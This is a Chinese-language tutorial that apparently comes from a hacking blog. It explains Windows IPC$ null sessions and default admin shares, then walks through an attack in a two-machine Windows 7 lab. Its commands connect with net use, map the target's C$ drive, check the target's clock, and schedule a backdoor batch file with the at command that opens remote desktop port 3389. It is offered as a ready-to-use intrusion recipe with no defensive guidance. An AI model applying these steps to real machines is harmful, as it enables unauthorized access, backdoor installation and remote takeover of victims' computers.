IPC$(Internet Process Connection)是共享"命名管道"的资源(大家都是这么说的)，它是为了让进程间通信而开放的命名管道，可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的)，而利用这个空的连接，连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。我们总在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登陆功能,而且还打开了默认共享,即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$)。所有的这些,初衷都是为了方便管理员的管理,但好的初衷并不一定有好的收效,一些别有用心者(到底是什么用心?我也不知道,代词一个)会利用IPC$，访问共享资源,导出用户列表,并使用一些字典工具，进行密码探测,寄希望于获得更高的权限,从而达到不可告人的目的。

一、环境配置

攻击机系统：windows7 64位 攻击机IP：192.168.1.45
吧唧机系统：windows7 64位 吧唧机IP：192.168.1.46
攻击使用端口：139

二、攻击过程

1.连接

首先使用端口扫描工具进行渗透扫描，是否开启139端口，或者IPC$共享服务。
(PS：可以直接使用命令进行连接，手动判断。)

命令如下（请确保你们在同一网段）：

net use \\192.168.1.46\ipc$"Password" /user:"Username"

由于本人已经建立连接，所以导致错误。
也可以使用此命令直接连接，需要输入账户密码。

net use \\192.168.1.46

一个是已经输入了账户密码，一个是连接后输入账户密码，推荐第二个。

2.如何渗透

建立连接之后该如何渗透呢？
首先，我们将对方的C盘映射到我们本地或者服务器上面。

net use z: \\192.168.1.46\c$

命令解析： z: 是你本地盘符，请不要重复你本地已有盘符。
命令解析： \192.168.1.46\c$ 吧唧机的C盘目录。

将文件直接复制到吧唧机上，如何运行呢？

首先获取吧唧机的时间，创建计划任务需要用到。

net time \\192.168.1.46

创建计划任务，运行1.bat后门程序

at \\192.168.1.46 19:45 C:\1.bat

命令解析：创建计划任务，运行吧唧机C盘目录下的1.bat文件
PS：计划任务只可以运行bat或者exe文件。
记住，创建的时间一定要比吧唧机时间大，否则要到明天才会运行任务...

等待创建时间过去，我们开始远程连接吧唧机。

连接成功，这里就不登录了，bat或者exe的用途很多，自己想吧。

附：1.bat开启3389端口命令

仅供学习交流！！！